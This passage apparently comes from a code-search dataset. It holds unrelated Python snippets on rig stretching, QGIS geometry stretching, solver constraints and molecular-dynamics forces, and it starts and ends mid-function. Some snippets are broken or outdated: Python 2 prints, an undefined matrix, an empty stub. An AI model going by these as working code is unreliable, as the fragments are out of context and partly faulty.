auto_stretch_clamp+'.inputR')\n\n mc.connectAttr(auto_stretch_clamp+'.outputR', lo_auto_stretch_mdl+'.input2', f=1)\n mc.connectAttr(auto_stretch_clamp+'.outputR', wrist_auto_stretch_mdl+'.input2', f=1)\n\n adl = mc.createNode('addDoubleLinear')\n mc.connectAttr(lo_arm_ik_scale_mdl+'.output', adl+'.input1')\n mc.connectAttr(wrist_ik_scale_mdl+'.output', adl+'.input2')\n utils.connect_abs(adl+'.output', root_to_end_dist+'.jointChainLength')\n\n # handle soft ik handle constraint override\n pc = mc.pointConstraint(ik_last_node, ik_handle)[0]\n if mc.objExists(up_arm_ik_jnt+'.softIkChainLength'):\n\n # compensate feed in new chain length for soft ik chain length\n utils.connect_abs(adl+'.output', up_arm_ik_jnt+'.softIkChainLength')\n\n # blend off the soft ik constraint IF im in auto s tretch or pin mode\n mdl = mc.createNode('multDoubleLinear')\n utils.connect_reverse(ik_ctrl+'.'+pin_attr_name, mdl+'.input1')\n utils.connect_reverse(ik_ctrl+'.autoStretch', mdl+'.input2')\n mc.connectAttr(mdl+'.output', pc+'.w0')\n utils.connect_reverse(pc+'.w0', pc+'.w1')\n\n ik_auto_stretch_final_output = [lo_auto_stretch_mdl+'.output', wrist_auto_stretch_mdl+'.output']\n\n # now create all my blends\n\n # first blend btween FK and an empty ik input\n # (this ikl input will take another blend node for blending oall the IK options )\n fk_to_ik_blend = mc.createNode('blendColors')\n\n mc.connectAttr(switch_ctrl+'.IK', fk_to_ik_blend+'.blender')\n mc.connectAttr(fk_stretch_final_output[0], fk_to_ik_blend+'.color2R')\n mc.connectAttr(fk_stretch_final_output[1], fk_to_ik_blend+'.color2G')\n\n # now create a blender between pin elbow and the rest of the ik options\n auto_ik_blend = mc.createNode('blendColors')\n\n mc.connectAttr(ik_ctrl+'.autoStretch', auto_ik_blend+'.blender')\n mc.connectAttr(ik_auto_stretch_final_output[0], auto_ik_blend+'.color1R')\n mc.connectAttr(ik_auto_stretch_final_output[1], auto_ik_blend+'.color1G')\n\n # Now connect it toth fk blend\n mc.connectAttr(auto_ik_blend+'.outputR', fk_to_ik_blend+'.color1R')\n mc.connectAttr(auto_ik_blend+'.outputG', fk_to_ik_blend+'.color1G')\n\n # now create a blender between pin elbow and the rest of the ik options\n pin_ik_blend = mc.createNode('blendColors')\n\n mc.connectAttr(ik_ctrl+'.'+pin_attr_name, pin_ik_blend+'.blender')\n mc.connectAttr(pin_final_output[0], pin_ik_blend+'.color1R')\n mc.connectAttr(pin_final_output[1], pin_ik_blend+'.color1G')\n\n # Now connect it toth fk blend\n mc.connectAttr(pin_ik_blend+'.outputR', auto_ik_blend+'.color2R')\n mc.connectAttr(pin_ik_blend+'.outputG', auto_ik_blend+'.color2G')\n\n # now connect the shift and scale\n mc.connectAttr(ik_stretch_final_output[0], pin_ik_blend+'.color2R')\n mc.connectAttr(ik_stretch_final_output[1], pin_ik_blend+'.color2G')\n\n # now for the magic! 
Connect the blend networll to joints\n mc.connectAttr(fk_to_ik_blend+'.outputR', lo_arm_ik_jnt+'.tx')\n mc.connectAttr(fk_to_ik_blend+'.outputG', wrist_ik_jnt+'.tx')", "def gripStretchQgsGeometry(geom, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve):\n wkbType = geom.wkbType()\n if wkbType == QGis.WKBPoint or wkbType == QGis.WKBPoint25D:\n pt = stretchPoint(geom.asPoint(), ptListToStretch, offSetX, offSetY)\n if pt is not None:\n return QgsGeometry.fromPoint(pt)\n \n if wkbType == QGis.WKBMultiPoint:\n stretchedGeom = QgsGeometry(geom)\n points = stretchedGeom.asMultiPoint() # vettore di punti\n atSubGeom = 0\n for pt in points:\n subGeom = QgsGeometry.fromPoint(pt)\n stretchedSubGeom = gripStretchQgsGeometry(subGeom, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve)\n stretchedGeom = qad_utils.setSubGeom(stretchedGeom, stretchedSubGeom, [atSubGeom]) \n atSubGeom = atSubGeom + 1\n return stretchedGeom\n\n if wkbType == QGis.WKBLineString:\n return gripStretchQgsLineStringGeometry(geom, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve)\n \n if wkbType == QGis.WKBMultiLineString:\n stretchedGeom = QgsGeometry(geom)\n lines = stretchedGeom.asMultiPolyline() # lista di linee\n atSubGeom = 0\n for line in lines: \n subGeom = QgsGeometry.fromPolyline(line)\n stretchedSubGeom = gripStretchQgsGeometry(subGeom, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve)\n stretchedGeom = qad_utils.setSubGeom(stretchedGeom, stretchedSubGeom, [atSubGeom]) \n atSubGeom = atSubGeom + 1\n return stretchedGeom\n \n if wkbType == QGis.WKBPolygon:\n stretchedGeom = QgsGeometry(geom)\n lines = stretchedGeom.asPolygon() # lista di linee\n atSubGeom = 0\n for line in lines: \n subGeom = QgsGeometry.fromPolyline(line)\n stretchedSubGeom = gripStretchQgsGeometry(subGeom, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve)\n stretchedGeom = qad_utils.setSubGeom(stretchedGeom, stretchedSubGeom, [atSubGeom]) \n atSubGeom = atSubGeom + 1\n return stretchedGeom\n \n if wkbType == QGis.WKBMultiPolygon:\n stretchedGeom = QgsGeometry(geom)\n polygons = geom.asMultiPolygon() # vettore di poligoni\n atSubGeom = 0\n for polygon in polygons:\n subGeom = QgsGeometry.fromPolygon(polygon)\n stretchedSubGeom = gripStretchQgsGeometry(subGeom, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve)\n stretchedGeom = qad_utils.setSubGeom(stretchedGeom, stretchedSubGeom, [atSubGeom]) \n atSubGeom = atSubGeom + 1\n return stretchedGeom\n \n return None", "def gripStretchCircle(circle, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve):\n newCenter = QgsPoint(circle.center)\n newRadius = circle.radius\n \n for ptToStretch in ptListToStretch:\n if qad_utils.ptNear(ptToStretch, circle.center): # se i punti sono sufficientemente vicini\n newCenter.set(circle.center.x() + offSetX, circle.center.y() + offSetY)\n elif circle.isPtOnCircle(ptToStretch):\n newPt = QgsPoint(basePt.x() + offSetX, basePt.y() + offSetY)\n newRadius = qad_utils.getDistance(circle.center, newPt)\n\n newCircle = qad_circle.QadCircle()\n if newCircle.set(newCenter, newRadius) == False:\n return None\n \n return newCircle", "def generate_constraints_between_chains(self):\n node_to_chain_mapping = defaultdict(set)\n # collect all places where each node is used and at what subchain index\n for chain_idx in range(len(self.chains)):\n chain = self.chains[chain_idx]\n for subchain_idx in range(len(chain)):\n parent, child = chain[subchain_idx]\n 
node_to_chain_mapping[parent].add(\n AbstractConstraint(chain_idx, subchain_idx)\n )\n # don't forget about the final child in the chain (parents are already accounted for)\n final_parent, final_child = chain[-1]\n node_to_chain_mapping[final_child].add(\n AbstractConstraint(chain_idx, len(chain))\n )\n # our final mapping correlates constraints on a per-chain basis\n # e.g. for chain index 0 at subchain index 1, we have a constraint (shared node) in chain 2\n chain_constraints = list()\n for chain_idx in range(len(self.chains)):\n chain = self.chains[chain_idx]\n chain_constraint = [set() for i in range(len(chain) + 1)]\n for subchain_idx in range(len(chain)):\n parent, child = chain[subchain_idx]\n node_constraints = node_to_chain_mapping[parent]\n for constraint in node_constraints:\n if constraint.chain_index != chain_idx:\n chain_constraint[subchain_idx].add(constraint)\n # don't forget about the final child in the chain (parents are already accounted for)\n final_parent, final_child = chain[-1]\n node_constraints = node_to_chain_mapping[final_child]\n for constraint in node_constraints:\n if constraint.chain_index != chain_idx:\n chain_constraint[len(chain)].add(constraint)\n chain_constraints.append(chain_constraint)\n return chain_constraints", "def stretch(points, stretches=[1, 1]):\n x = stretches[0] * points[0]\n y = stretches[1] * points[1]\n return [x, y]", "def _adjust_constraints(self, point):\n logger.info(f'Adjusting constraints on point {len(self)}')\n\n # Flat list of all the atom indexes involved in the bonds\n atom_idxs = [i for bond in self.bonds for i in bond]\n\n max_step, min_step = ade.Config.max_step_size, ade.Config.min_step_size\n\n for bond in self.bonds:\n (i, j), coords = bond.atom_indexes, self[-1].species.coordinates\n\n # Normalised r_ij vector\n vec = coords[j] - coords[i]\n vec /= np.linalg.norm(vec)\n\n # Calculate |∇E_i·r| i.e. the gradient along the bond. 
Positive\n # values are downhill in energy to form the bond and negative\n # downhill to break it\n gradi = np.dot(self[-1].grad[i], vec) # |∇E_i·r| bond midpoint\n gradj = np.dot(self[-1].grad[j], -vec)\n\n # Exclude gradients from atoms that are being substituted\n if atom_idxs.count(i) > 1:\n grad = gradj\n elif atom_idxs.count(j) > 1:\n grad = gradi\n else:\n grad = np.average((gradi, gradj))\n\n logger.info(f'|∇E_i·r| = {grad:.4f} on {bond}')\n\n # Downhill in energy to break/form this breaking/forming bond\n if grad * np.sign(bond.dr) > 0:\n dr = np.sign(bond.dr) * ade.Config.max_step_size\n\n # otherwise use a scaled value, depending on the gradient\n # large values will have small step sizes, down to min_step Å\n else:\n dr = (max_step - min_step) * np.exp(-(grad/0.05)**2) + min_step\n dr *= np.sign(bond.dr)\n\n new_dist = point.species.distance(*bond.atom_indexes) + dr\n\n # No need to go exceed final distances on forming/breaking bonds\n if bond.forming and new_dist < bond.final_dist:\n new_dist = bond.final_dist\n\n elif bond.breaking and new_dist > bond.final_dist:\n new_dist = bond.final_dist\n\n else:\n logger.info(f'Using step {dr:.3f} Å on bond: {bond}')\n\n point.constraints[bond.atom_indexes] = new_dist\n\n return None", "def gripStretchQgsLinearObjectList(linearObjectList, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve):\n linearObjectListToStretch = qad_utils.QadLinearObjectList(linearObjectList)\n \n atPart = 0\n while atPart < linearObjectListToStretch.qty():\n linearObject = linearObjectListToStretch.getLinearObjectAt(atPart) \n if linearObject.isSegment():\n pt = linearObject.getStartPt()\n if isPtContainedForStretch(pt, ptListToStretch): # se il punto è contenuto in ptListToStretch\n # cambio punto iniziale \n pt.setX(pt.x() + offSetX)\n pt.setY(pt.y() + offSetY)\n linearObject.setStartPt(pt)\n \n pt = linearObject.getEndPt()\n if isPtContainedForStretch(pt, ptListToStretch): # se il punto è contenuto in ptListToStretch\n # cambio punto finale\n pt.setX(pt.x() + offSetX)\n pt.setY(pt.y() + offSetY)\n linearObject.setEndPt(pt)\n else: # se è arco\n newArc, newInverseFlag = gripStretchArc(linearObject.getArc(), ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve, linearObject.isInverseArc())\n if newArc is None:\n return None\n linearObject.setArc(newArc, newInverseFlag)\n\n atPart = atPart + 1\n \n pt = linearObjectListToStretch.getCentroid(tolerance2ApproxCurve) # verifico se polilinea ha un centroide\n if pt is not None:\n if isPtContainedForStretch(pt, ptListToStretch): # se il punto è contenuto in ptListToStretch\n linearObjectListToStretch.move(offSetX, offSetY)\n\n return linearObjectListToStretch", "def make_shaped_repertoire(RNs):\n # get objective distribution\n bin_edges, obj_dist, volume = objective_distribution()\n # get an antigenic epitope sequence, and in case of nkey=1,2 check whether\n # it can populate all required bins, thus avoiding infinite loop below\n AgEpitope = get_AgEpitope(RNs)\n if cf.nkey == 1 or cf.nkey == 2:\n while 1:\n # get list of all possible binding partners and their energies\n all_partners = get_all_partners()\n all_energies = [E_best(partner, AgEpitope)\n for partner in all_partners]\n # check whether all bins are occupiable with these energies,\n # if not, get new epitope sequence\n indices = np.digitize(all_energies, bin_edges, right=True)\n ind_set = set(indices)\n ind_set.discard(0)\n # if all bins can be occupied, move on\n if ind_set == set(range(1, len(bin_edges))):\n break\n # else get a new epitope and 
check its validity\n else:\n AgEpitope = get_AgEpitope(RNs)\n # initialise empty list for counting how many seqs have been found per bin\n ist_dist = np.zeros(len(obj_dist))\n # seq_list for collecting identified sequences\n seq_list = []\n E_list = []\n # while ist_dist and obj_dist are not equal, get new sequences and position\n # them if they are useful\n # introduce a tolerance of how far bins are allowed to deviate from the\n # goal, as otherwise runtime explodes due to very long waiting times for\n # high binding energy codes in large nkey cases - allow an absolute\n # deviation of volume*tolerance % for each bin.\n abs_tol = volume * 0.005\n while np.sum(np.abs((ist_dist-obj_dist)) > abs_tol) > 0:\n ab = Ab_seq(RNs)\n Emax = E_best(ab, AgEpitope)\n # find index bin of this energy\n indx = np.digitize(Emax, bin_edges, right=True)\n # if the index is in the useful range and the bin is not yet full,\n # count the sequence and store it\n if indx in range(1, len(bin_edges)):\n if obj_dist[indx-1] - ist_dist[indx-1] > 0:\n ist_dist[indx-1] += 1\n seq_list.append(ab)\n E_list.append(Emax)\n\n return seq_list, E_list, AgEpitope", "def full_strain(x, dof):\n base = np.zeros([6, dof])\n\n if dof % 2 == 1:\n bending_start = 1\n base[0, 0] = 1 # constant torsion\n else:\n bending_start = 2\n base[0, 0] = 1 # constant torsion\n base[0, 1] = x # linear torsion\n\n base[1, bending_start] = 1 # y-bending\n base[1, bending_start + 1] = x # linear y-bending\n\n if dof <= 6:\n base[2, bending_start + 2] = 1 # z-bending\n base[2, bending_start + 3] = x # linear z-bending\n else:\n base[1, bending_start + 2] = x ** 2 # quadratic y-bending\n base[2, bending_start + 3] = 1 # z-bending\n base[2, bending_start + 4] = x # linear z-bending\n base[2, bending_start + 5] = x ** 2 # quadratic z-bending\n return base", "def generate_constraints():\n return list(chain(collect_rows(), collect_columns(), collect_blocks()))", "def make_stair(nstep,treadDept,riserHeight,landingLength,stepWidth,n):\n\tstep = MKPOL([[[0,0],[0,riserHeight],[2*treadDept,riserHeight], [treadDept,0]],[[1,2,3,4]],1])\n\tstep1 = MKPOL([[[0,0],[0,riserHeight],[treadDept,2*riserHeight], [treadDept,riserHeight]],[[1,2,3,4]],1])\n\tstep = PROD([QUOTE([stepWidth]),step])\n\tstep = TEXTURE(\"texture/Liptus.jpg\")(step)\n\thandrailTop = PROD([QUOTE([stepWidth/15.0]),step1])\n\thandrail = CIRCLE(stepWidth/30.0)([20,20])\n\n\thandrail = PROD([QUOTE([1]),handrail])\n\n\thandrail = R([1,3])(PI/2)(handrail)\n\thandrail = T([1,2,3])([stepWidth-(stepWidth/30.0),treadDept/2,riserHeight])(handrail)\n\thandrail = COLOR(BLACK)(handrail)\n\tstep = STRUCT([step,handrail])\n\thandrailTop = R([2,3])(PI)(handrailTop)\n\thandrailTop = T([1,2,3])([stepWidth-(stepWidth/15.0),treadDept,1+2*riserHeight])(handrailTop)\n\thandrailTop = TEXTURE(\"texture/Liptus.jpg\")(handrailTop)\n\tstep = STRUCT([step,handrailTop])\n\tstair = [step]\n\tif n == 0:\n\t\tstair = []\n\t\"\"\" realization total step \"\"\"\n\tfor i in range(nstep):\n\t\tstep = T([2,3])([treadDept,riserHeight])(step)\n\t\tstair.append(step)\n\tfinalStep = T([2,3])([(treadDept*(nstep+1)),(riserHeight*(nstep))])(CUBOID([stepWidth,landingLength,riserHeight]))\n\tfinalStep = TEXTURE(\"texture/Liptus.jpg\")(finalStep)\n\tstair.append(finalStep)\n\treturn STRUCT(stair)", "def createSpSwConstraint(parents, target, enumNames, niceNames=['Space'],constrType='parent',constrTarget=''):\n if constrTarget == '':\n if target.endswith('_CTRL'):\n stripName=target.rpartition('_')\n constrTarget=stripName[0]+'Ctrl_ROOT'\n 
else:\n constrTarget=target\n\n if niceNames <= 1:\n niceName=niceNames\n else:\n niceName=''\n for i,x in enumerate(niceNames):\n if i < len(niceNames)-1:\n niceName=niceName+x+' / '\n else:\n niceName=niceName+x\n\n existingAttr=cmds.listAttr(target)\n constr=eval('cmds.'+constrType+'Constraint(parents,constrTarget,mo=True)')\n if 'spSwSep' not in existingAttr:\n cmds.addAttr(target, ln='spSwSep', nn='___ Space Switching', at='enum', en='___', k=True)\n cmds.addAttr(target, ln='spaceSwitch', nn=niceName+' Switch', at='enum', en=enumNames, k=True)\n for i,x in enumerate(parents):\n if not i == 1:\n rev=cmds.createNode('reverse', n=target+'spaceSwitch_REV')\n cmds.connectAttr(target+'.spaceSwitch',rev+'.inputX')\n cmds.connectAttr(rev+'.outputX', constr[0]+'.'+x+'W'+str(i))\n else:\n cmds.connectAttr(target+'.spaceSwitch', constr[0]+'.'+x+'W'+str(i))", "def pk_constrained(self, snr=30, headroom = 0):\n # Initialize\n self.pk = np.zeros((self.n_waves, len(self.controls.k0)), dtype=np.csingle)\n # loop over frequencies\n bar = tqdm(total = len(self.controls.k0), desc = 'Calculating Constrained Optim.')\n for jf, k0 in enumerate(self.controls.k0):\n # get the scaled version of the propagating directions\n k_vec = k0 * self.dir\n # Form the sensing matrix\n h_mtx = np.exp(1j*self.receivers.coord @ k_vec.T)\n H = h_mtx.astype(complex) # cvxpy does not accept floats, apparently\n # measured data\n pm = self.pres_s[:,jf].astype(complex)\n # Performing constrained optmization cvxpy\n x_cvx = cp.Variable(h_mtx.shape[1], complex = True) # create x variable\n # Create the problem\n epsilon = 10**(-(snr-headroom)/10)\n problem = cp.Problem(cp.Minimize(cp.norm2(x_cvx)**2),\n [cp.pnorm(pm - cp.matmul(H, x_cvx), p=2) <= epsilon])\n problem.solve(solver=cp.SCS, verbose=False)\n self.pk[:,jf] = x_cvx.value\n bar.update(1)\n bar.close()", "def constraints(self) -> Tuple[NDArray, NDArray]:", "def generate_powerset_bridge_constraints(problem):\n\n c_30 = _dynamic_constraint_30(problem)\n c_33 = _dynamic_constraint_33(problem)\n c_34 = _dynamic_constraint_34(problem)\n c_35 = _dynamic_constraint_35(problem)\n c_36 = _dynamic_constraint_36(problem)\n\n return c_30 & c_33 & c_34 & c_35 & c_36", "def constraints(self):\n ...", "def gripStretchArc(arc, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve, inverseArc = None):\n startPt = arc.getStartPt()\n endPt = arc.getEndPt()\n middlePt = arc.getMiddlePt()\n newStartPt = QgsPoint(startPt)\n newEndPt = QgsPoint(endPt)\n newMiddlePt = QgsPoint(middlePt)\n newCenter = None\n startPtChanged = endPtChanged = middlePtPtChanged = False\n for ptToStretch in ptListToStretch:\n if qad_utils.ptNear(ptToStretch, arc.center): # se i punti sono sufficientemente vicini\n newCenter = QgsPoint(arc.center.x() + offSetX, arc.center.y() + offSetY)\n else:\n if qad_utils.ptNear(startPt, ptToStretch):\n newStartPt.set(startPt.x() + offSetX, startPt.y() + offSetY)\n startPtChanged = True\n elif qad_utils.ptNear(endPt, ptToStretch):\n newEndPt.set(endPt.x() + offSetX, endPt.y() + offSetY)\n endPtChanged = True\n elif qad_utils.ptNear(middlePt, ptToStretch):\n newMiddlePt.set(middlePt.x() + offSetX, middlePt.y() + offSetY)\n middlePtPtChanged = True\n \n newArc = qad_arc.QadArc()\n if newArc.fromStartSecondEndPts(newStartPt, newMiddlePt, newEndPt) == False:\n return None\n \n # se il centro era nei punti di grip\n if newCenter is not None:\n # se i tre punti dell'arco erano nei punti di grip oppure\n # allora non cambio il centro\n if (startPtChanged and endPtChanged and 
middlePtPtChanged):\n pass\n else:\n newArc.center.set(newCenter.x(), newCenter.y())\n \n if inverseArc is not None: # se l'arco faceva parte di una linestring\n # verifico il verso del nuovo arco\n if qad_utils.ptNear(newStartPt, newArc.getStartPt()):\n # stesso verso del vecchio arco\n return newArc, inverseArc\n else:\n return newArc, not inverseArc\n \n return newArc", "def create_cont_constraint_mat_separable(H,v1s,v2s,nSides,nConstraints,nC,\n dim_domain,dim_range,tess):\n if dim_domain != 2:\n raise ValueError\n if dim_range not in [1,2]:\n raise ValueError\n nHomoCoo=dim_domain+1 \n length_Avee = dim_range*nHomoCoo\n L1 = np.zeros((nConstraints/2,nC*nHomoCoo))\n\n \n\n nPtsInSide = 2 # Since, in 2D, the side is always a line joining 2 pts.\n# if nSides != nConstraints/(nPtsInSide*dim_domain):\n# raise ValueError(nSides,nConstraints)\n \n if nSides != nConstraints/(nPtsInSide*dim_range):\n print \" print nSides , nConstraints/(nPtsInSide*dim_range):\"\n print nSides , nConstraints/(nPtsInSide*dim_range)\n ipshell('stop')\n raise ValueError( nSides , (nConstraints,nPtsInSide,dim_range))\n\n \n if nSides != H.shape[0]:\n raise ValueError(nSides,H.shape)\n\n\n# M = nPtsInSide*dim_range\n M = nPtsInSide\n if dim_range == 1:\n raise NotImplementedError\n for i in range(nSides): \n v1 = v1s[i]\n v2 = v2s[i]\n \n h = H[i]\n a,b = h.nonzero()[0] # idx for the relevant As \n # s stands for start\n # e stands for end \n s1 = a*length_Avee \n e1 = s1+nHomoCoo \n s2 = b*length_Avee\n e2 = s2+nHomoCoo \n \n # Constraint 1: \n L[i*M,s1:e1]= v1 \n L[i*M,s2:e2]= -v1 \n # Constraint 2: \n L[i*M+1,s1:e1]= v2 \n L[i*M+1,s2:e2]= -v2 \n \n \n elif dim_range==2:\n for i in range(nSides): \n v1 = v1s[i]\n v2 = v2s[i]\n\n if np.allclose(v1,v2):\n raise ValueError(v1,v2)\n\n\n \n \n \n h = H[i]\n a,b = h.nonzero()[0] # idx for the relevant As \n \n\n # L1 is acting on columns of the following form:\n # [ a_1 b_1 c_1 d_1 a_2 b_2 c_2 d_2 ... 
a_Nc b_Nc c_Nc d_Nc] \n # s stands for start\n # e stands for end \n s1 = a*nHomoCoo\n e1 = s1+nHomoCoo \n s2 = b*nHomoCoo\n e2 = s2+nHomoCoo \n \n \n try: \n # Constraint 1: \n row = np.zeros(L1.shape[1])\n row[s1:e1]=v1\n row[s2:e2]=-v1 \n # x component \n L1[i*M]=row \n except:\n ipshell('fail')\n raise \n\n # Constraint 2: \n row = np.zeros(L1.shape[1])\n row[s1:e1]=v2\n row[s2:e2]=-v2 \n # x component \n L1[i*M+1]=row\n \n\n \n \n \n \n \n else:\n raise ValueError(dim_range)\n\n \n return L1", "def create_fk_chain(controls, joints):\n\n # create control offset transforms\n constraints = []\n exp_tf_ms = []\n\n for ctl in controls:\n par = cmds.listRelatives(ctl, parent=True)\n buf = create_offset_transform(ctl, BUF)\n exp = create_offset_transform(ctl, EXP)\n off = create_offset_transform(ctl, OFF)\n\n cmds.parent(ctl, off)\n cmds.parent(off, exp)\n cmds.parent(exp, buf)\n if par: cmds.parent(buf, par[0])\n\n exp_tf_ms.append(buf)\n\n for src, trg in zip(controls, joints):\n # constrain fk joints to controls, hide the constraint nodes\n pc = cmds.parentConstraint(src, trg, mo=True)[0]\n cmds.setAttr('{node}.interpType'.format(node=pc), 2)\n cmds.setAttr('{node}.visibility'.format(node=pc), False)\n sc = cmds.scaleConstraint(src, trg)[0]\n cmds.setAttr('{node}.visibility'.format(node=sc), False)\n constraints.extend([pc, sc])\n\n return constraints, exp_tf_ms", "def generate_all_constraints(traj,policy,mdp):\n #print('generating all constraints')\n constraints = []\n traj_tmp = list(traj)\n #print(traj_tmp)\n #compute halfspace normals for all (s,a) pairs until terminal\n while(len(traj_tmp)>1):\n constraints += generate_half_space_normals(traj_tmp,policy,mdp)\n #print(constraints)\n traj_tmp.pop(0)\n #print('after pop',traj_tmp)\n return constraints", "def test_tensor_composite_constraints_equal_penalties():\n from pygam.penalties import derivative\n\n def der1(*args, **kwargs):\n kwargs.update({'derivative':1})\n return derivative(*args, **kwargs)\n\n # create a 3D tensor where the penalty should be equal to the constraint\n term = te(0, 1, 2,\n n_splines=[4, 5, 6],\n penalties=der1,\n lam=1,\n constraints='monotonic_inc')\n\n # check all the dimensions\n for i in range(3):\n P = term._build_marginal_penalties(i).A\n C = term._build_marginal_constraints(i,\n -np.arange(term.n_coefs),\n constraint_lam=1,\n constraint_l2=0).A\n\n assert (P == C).all()", "def initializeConstraints(self):\n constraints = []\n\n for i in range(9):\n for j in range(9):\n for k in range(j+1, 9):\n # initialize row constraints\n constraints.append((i*9 + j, i*9 + k))\n # initialize col constraints\n constraints.append((j*9 + i, k*9 + i))\n\n # initialize square constraints\n pos1 = i * 9 + j\n for diff in [7, 8, 10, 11, 16, 17, 19, 20]:\n pos2 = i * 9 + j + diff\n if self.inSameSquare(pos1, pos2):\n constraints.append((pos1, pos2))\n\n return constraints", "def linear_strain(x, dof):\n base = np.zeros([6, dof])\n base[1, 0] = 1 # initial y-bending\n if dof > 2:\n base[1, 1] = x # linear y-bending term\n base[2, dof-1] = x # linear z-bending term\n return base", "def force ( box, strain, r ):\n\n import numpy as np\n from itertools import product\n import math\n \n # It is assumed that positions are in units where box = 1\n # Forces are calculated in units where sigma = 1 and epsilon = 1\n # Lees-Edwards boundaries, in sliding brick arrangement\n # Flow/gradient/vorticity directions are x/y/z == 0/1/2\n # Uses neighbour lists\n\n n = r.shape[0]\n\n # Set up vectors to half the cells in neighbourhood of 3x3x3 
cells in cubic lattice\n # The cells are chosen so that if (d0,d1,d2) appears, then (-d0,-d1,-d2) does not.\n # The last three cells are extra ones, to cope with the sheared system\n d = np.array ( [ [ 0, 0, 0], [ 1, 0, 0], [ 1, 0, 1], [-1, 0, 1], [ 0, 0, 1], # 5 cells with d1=0\n [ 1, 1, -1], [ 1, 1, 0], [ 1, 1, 1], # 3 cells with d0= 1, d1=1\n [ 0, 1, -1], [ 0, 1, 0], [ 0, 1, 1], # 3 cells with d0= 0, d1=1\n [-1, 1, -1], [-1, 1, 0], [-1, 1, 1], # 3 cells with d0=-1, d1=1\n [-2, 1, -1], [-2, 1, 0], [-2, 1, 1] ] ) # 3 cells with d0=-2, d1=1\n\n r[:,0] = r[:,0] - np.rint(r[:,1])*strain # Extra correction in box=1 units\n r = r - np.rint(r) # Ensure all atoms in periodic box\n \n sr2_ovr = 1.77 # Overlap threshold (pot > 100)\n r_cut_box = r_cut / box\n r_cut_box_sq = r_cut_box ** 2\n box_sq = box ** 2\n\n # Initialize\n f = np.zeros_like(r)\n total = PotentialType ( pot=0.0, vir=0.0, pyx=0.0, lap=0.0, ovr=False )\n\n # Calculate cell index triplets\n sc = math.floor(box/r_cut) # Number of cells along box edge\n assert sc >= 3, 'System is too small for cells' # Guard against box being too small\n c = np.floor((r+0.5)*sc).astype(np.int_) # N*3 array of cell indices for all atoms\n assert np.all(c>=0) and np.all(c<sc), 'Index error' # Simplistic \"guard\" against roundoff\n\n shift = math.floor(strain*sc) # Strain measured in cell lengths\n\n if fast:\n \n # Build list of arrays, each array holding positions of atoms in a cell\n # At the same time, define a matching set of force arrays in each cell\n # i and j number the atoms in each cell; we do not refer explicitly to indices in r\n rc, fc = [], [] # Initially empty lists of positions and forces\n for ci in product(range(sc),repeat=3): # Triple loop over cells\n mask = np.all(c==ci,axis=1) # Mask identifies atoms in this cell\n rc.append(r[mask,:]) # Copy atom coordinates into array, add to list\n fc.append(np.zeros_like(rc[-1])) # Zero corresponding forces, add to list\n\n for ci1, rci in enumerate(rc): # Loop over i-cells, getting all atoms in each i-cell as an array\n ci = np.unravel_index(ci1,(sc,sc,sc)) # Get i-cell triple-indices\n if rci.size==0: # Handle empty cell\n continue\n\n # Set up correct neighbour cell indices\n if ci[1]==sc-1: # i-cell is in the top layer\n dd = d.copy() # Standard list copied, including extra 3 cells\n dd[5:,0] = d[5:,0] - shift # All those looking up need adjustment in the x direction\n else: # i-cell is not in top layer\n dd = d[:-3,:].copy() # Last three extra cells are not needed; shift is not needed\n \n for dj in dd: # Loop over neighbouring j-cells\n cj = ci + dj # Compute neighbour j-cell triple-indices\n cj1 = np.ravel_multi_index(cj,(sc,sc,sc),mode='wrap') # Convert j-cell to single-index\n rcj = rc[cj1] # Get atoms in j-cell as an array\n if rcj.size==0: # Handle empty cell\n continue\n\n rij = rci[:,np.newaxis,:]-rcj[np.newaxis,:,:] # Separation vectors for all i and j\n rij[:,:,0] = rij[:,:,0] - np.rint(rij[:,:,1])*strain # Extra correction in box=1 units\n rij = rij - np.rint(rij) # PBCs in box=1 units\n rij_sq = np.sum(rij**2,axis=2) # Squared separations\n in_range = rij_sq < r_cut_box_sq # Set flags for within cutoff\n\n if ci1==cj1:\n np.fill_diagonal(in_range,False) # Eliminate i==j when i-cell==j-cell\n np.fill_diagonal(rij_sq,1.0) # Avoid divide-by-zero below\n\n rij_sq = rij_sq * box_sq # Now in sigma=1 units\n rij = rij * box # Now in sigma=1 units\n sr2 = np.where ( in_range, 1.0/rij_sq, 0.0 ) # (sigma/rij)**2, only if in range\n ovr = sr2 > sr2_ovr # Overlap if too close\n sr6 = 
sr2 ** 3\n sr12 = sr6 ** 2\n pot = sr12 - sr6 # LJ potential (cut but not shifted)\n vir = pot + sr12 # LJ virial\n pot = np.where ( in_range, pot+0.25, 0.0 ) # WCA LJ pair potential (cut-and-shifted)\n lap = ( 22.0*sr12 - 5.0*sr6 ) * sr2 # LJ Laplacian\n fij = vir * sr2 # LJ scalar part of forces\n fij = rij * fij[:,:,np.newaxis] # LJ pair forces\n pyx = rij[:,:,1]*fij[:,:,0] # Off-diagonal element of pressure tensor\n\n if ci1==cj1: # Correct for double-counting ij and ji when i-cell==j-cell\n fij = fij / 2\n total = total + PotentialType ( pot=np.sum(pot)/2, vir=np.sum(vir)/2, \n pyx=np.sum(pyx)/2, lap=np.sum(lap)/2, ovr=np.any(ovr) )\n else:\n total = total + PotentialType ( pot=np.sum(pot), vir=np.sum(vir), \n pyx=np.sum(pyx), lap=np.sum(lap), ovr=np.any(ovr) )\n\n fc[ci1][:,:] = fc[ci1][:,:] + np.sum(fij,axis=1) # Aggregate force on atoms in i-cell\n fc[cj1][:,:] = fc[cj1][:,:] - np.sum(fij,axis=0) # Aggregate force on atoms in j-cell\n\n # Copy forces from list of cell arrays to main force array\n for ci in product(range(sc),repeat=3): # Triple loop over cells\n mask = np.all(c==ci,axis=1) # Mask identifies atoms in this cell\n ci1 = np.ravel_multi_index(ci,(sc,sc,sc),mode='wrap') # Single-index\n f[mask,:] = fc[ci1] # Copy atom forces from correct cell\n\n else:\n \n # Build list of arrays, each array holding indices of atoms in a cell\n # ki and kj are atom indices in the r array; i and j number the atoms in each cell\n k_array = np.arange(n) # Atom indices 0..N-1\n kc = [] # 